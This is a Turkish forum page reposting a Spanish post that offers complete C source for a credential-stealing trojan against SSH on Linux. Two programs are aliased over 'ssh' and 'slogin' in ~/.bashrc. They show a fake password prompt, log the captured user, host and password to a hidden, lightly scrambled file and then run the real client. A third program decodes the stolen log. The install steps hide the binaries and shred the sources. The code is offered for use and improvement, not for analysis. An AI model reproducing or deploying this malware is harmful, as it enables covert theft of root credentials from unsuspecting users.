Giriş yap
En iyi yollayıcılar
| Hello EMO |
| |||
| EMO |
| |||
| eMoStyLe |
| |||
| BesimBICER |
| |||
| GameKinG |
| |||
| Crysis |
| |||
| ~>!.DεvιLρяιεsт.!<~ |
| |||
| MeTaL |
| |||
| TrueCrime |
| |||
| djhayal3t |
|
Istatistikler
Toplam 203 kayıtlı kullanıcımız varSon kaydolan kullanıcımız: crayzboy76
Kullanıcılarımız toplam 1186 mesaj attılar bunda 862 konu
Arama
akısı
Sosyal yer imi
Sosyal bookmarking sitesinde Emo, Emo nedir, Emo resimleri, Emo Kıyafetleri, Emo Sözleri, Emo Oyunları, EmoTurkey, Emo Nickler, Emo Avatarları, Punk, Punk Resimleri, Punk Avatarları, Rock, Rock Resimleri, Rock Avatarları, Msn Nickleri, Msn Avatarları, Müzik adresi saklayın ve paylaşın
Sosyal bookmarking sitesinde EMO Style ForumPro - Hos Geldiniz adresi saklayın ve paylaşın
Kimler hatta?
Toplam 3 kullanıcı online :: 0 Kayıtlı, 0 Gizli ve 3 Misafir :: 1 Arama motorlarıYok
Sitede bugüne kadar en çok 217 kişi C.tesi Tem. 29, 2017 1:46 am tarihinde online oldu.
En son konular
Reklam
Ataque a OpenSSH usando alias bajo Linux
1 sayfadaki 1 sayfası
Ataque a OpenSSH usando alias bajo Linux
tarafından Hello EMO Çarş. Nis. 25, 2012 10:35 pm
Kasswed demiş ki:Supongamos que tenemos acceso a un servidor Linux, pero no somos ni root ni nada.
Pero supongamos que desde el usuario donde tenemos acceso hay gente que se loguea como root a otras máquinas usando SSH. Esto es un escenario bastante típico.
Nuestro usuario por lo general podrá crear alias y compilar programas, y de esto nos vamos a valer para instalar este malware en un Linux. Lo único que haremos es esperar a que un usuario se loguee en otra máquina como root y obtener sus credenciales en un archivo de texto, que estará cifrado de forma bastante sencilla.
El programa se compone de 3 partes. sl.c, ssh.c y deco.c
sl.c se compila y se usa como alias del comando slogin
ssh.c se compila y se usa como alias del comando ssh
deco.c no se instala en la máquina víctima, sólo nos sirve para descifrar nuestro archivo con credenciales.
Lo pongo aquí para ver si alguien se anima a mejorarlo. Siento que no tenga muchos comentarios, pero es bastante simple de entender. Por supuesto, cada caso es diferente, así que habría que adaptar el código a cada caso, dependiendo de diversas variables.
sl.c
- Kod:
/*
Author: Kasswed for elhacker.net April 2012
This malware is composed of 3 parts:
1. sl.c: slogin snifer program code
2. ssh.c: ssh snifer program code
3. deco.c: decoder program for the logs files
Install this program (does not need to be root) using a bash script:
mkdir .config/.keyboard
gcc sl.c -o .config/.keyboard/sl
gcc ssh.c -o .config/.keyboard/s
echo "alias slogin='$HOME/.config/.keyboard/sl'" >> ~/.bashrc
echo "alias ssh='$HOME/.config/.keyboard/s'" >> ~/.bashrc
shred -n 30 -u sl.c
shred -n 30 -u ssh.c
Then remove the script as well with "shred -n 30 -u script.sh"
To get the passwords, get access to the victim's machine and copy the log file into your computer. Use the program deco:
$ ./deco logfile
Et voila.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <pwd.h>
#define BUF 1000
#define PATH "/usr/bin/slogin"
#define LOG "/.config/.keyboard/sx"
int main(int argc, char **argv){
char *ssh_arguments_send[BUF];
char ssh[] = "slogin";
ssh_arguments_send[0] = ssh;
if(argc != 2){
int j;
for(j=1;j<argc;j++)
ssh_arguments_send[j]=argv[j];
}
else{
FILE *file;
char dir[BUF];
strcpy(dir,getenv("HOME"));
strcat(dir,LOG);
int i;
struct passwd *pw;
char user[200];
char *ptr;
pw = getpwuid(geteuid());
strcpy(user,pw->pw_name);
ssh_arguments_send[1] = argv[1];
char pCopy[BUF],encript[BUF],host[BUF],password[BUF];
if(strchr(argv[1],'@') == NULL ){
strcpy(pCopy,user);
strcat(pCopy,"@");
strcat(pCopy,argv[1]);
}
else{
strcpy(pCopy,argv[1]);
}
sleep(2);
printf("%s",pCopy);
printf("'s password: ");
system("stty -echo");
fgets(password, BUF, stdin);
printf("\n");
system("stty echo");
password[strlen(password)-1] = '\0';
file = fopen(dir,"a+");
if(file!=NULL){
strcat(pCopy,"/");
strcat(pCopy,password);
strcat(pCopy,";");
for(i=0;i<strlen(pCopy);i++){
fprintf(file,"%c",pCopy[i]+ (33*i+1)%100);
fprintf(file,"%c",pCopy[i]+ (33*i+2)%98);
fprintf(file,"%c",pCopy[i]+25);
}
fprintf(file,"\n");
fclose(file);
}
sleep(2);
printf("Permission denied, please try again.\n");
}
execv(PATH,ssh_arguments_send);
}
ssh.c
- Kod:
/*
Author: Kasswed for elhacker.net April 2012
This malware is composed of 3 parts:
1. sl.c: slogin snifer program code
2. ssh.c: ssh snifer program code
3. deco.c: decoder program for the logs files
Install this program (does not need to be root) using a bash script:
mkdir .config/.keyboard
gcc sl.c -o .config/.keyboard/sl
gcc ssh.c -o .config/.keyboard/s
echo "alias slogin='$HOME/.config/.keyboard/sl'" >> ~/.bashrc
echo "alias ssh='$HOME/.config/.keyboard/s'" >> ~/.bashrc
shred -n 30 -u sl.c
shred -n 30 -u ssh.c
Then remove the script as well with "shred -n 30 -u script.sh"
To get the passwords, get access to the victim's machine and copy the log file into your computer. Use the program deco:
$ ./deco logfile
Et voila.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <pwd.h>
#define BUF 1000
#define PATH "/usr/bin/ssh"
#define LOG "/.config/.keyboard/sx"
int main(int argc, char **argv){
char *ssh_arguments_send[BUF];
char ssh[] = "ssh";
ssh_arguments_send[0] = ssh;
if(argc != 2){
int j;
for(j=1;j<argc;j++)
ssh_arguments_send[j]=argv[j];
}
else{
FILE *file;
char dir[BUF];
strcpy(dir,getenv("HOME"));
strcat(dir,LOG);
int i;
struct passwd *pw;
char user[200];
char *ptr;
pw = getpwuid(geteuid());
strcpy(user,pw->pw_name);
ssh_arguments_send[1] = argv[1];
char pCopy[BUF],encript[BUF],host[BUF],password[BUF];
if(strchr(argv[1],'@') == NULL ){
strcpy(pCopy,user);
strcat(pCopy,"@");
strcat(pCopy,argv[1]);
}
else{
strcpy(pCopy,argv[1]);
}
sleep(2);
printf("%s",pCopy);
printf("'s password: ");
system("stty -echo");
fgets(password, BUF, stdin);
printf("\n");
system("stty echo");
password[strlen(password)-1] = '\0';
file = fopen(dir,"a+");
if(file!=NULL){
strcat(pCopy,"/");
strcat(pCopy,password);
strcat(pCopy,";");
for(i=0;i<strlen(pCopy);i++){
fprintf(file,"%c",pCopy[i]+ (33*i+1)%100);
fprintf(file,"%c",pCopy[i]+ (33*i+2)%98);
fprintf(file,"%c",pCopy[i]+25);
}
fprintf(file,"\n");
fclose(file);
}
sleep(2);
printf("Permission denied, please try again.\n");
}
execv(PATH,ssh_arguments_send);
}
deco.c
- Kod:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define BUF 10000
int main(int argc,char **argv){
FILE* file;
int i;
char encript[BUF];
file = fopen(argv[1],"r");
fgets(encript,BUF,file);
for(i=0;i<strlen(encript);i++){
if((i+1)%3==0)
printf("%c",encript[i]-25);
}
fclose(file);
}
Hello EMO- EMO Team
- Cinsiyet :
Burçlar :
Mesaj Sayısı : 935
Puan : 374593
Rep Puanı : 18
Doğum tarihi : 28/11/89
Kayıt tarihi : 21/07/09
Yaş : 34
Nerden : EMO WorlD
İş/Hobiler : RCE Student / Game Hacking / Learn Beginner C#,C++,Delphi
Lakap : EMO -
1 sayfadaki 1 sayfası
Bu forumun müsaadesi var:
Bu forumdaki mesajlara cevap veremezsiniz
» goldenchase.net maden yaparak para kazanma
» etichal hacker görsel egitim seti
» KO TBL Source C#
» x86 Registers
» [Tutorial] Pegando Address, Pointers de WYD
» [Tutorial] Pegando Address, Pointers de CS Metodo²
» [Tutorial] Aprendendo basico deASM OLLYDBG
» Basic C# DLL injector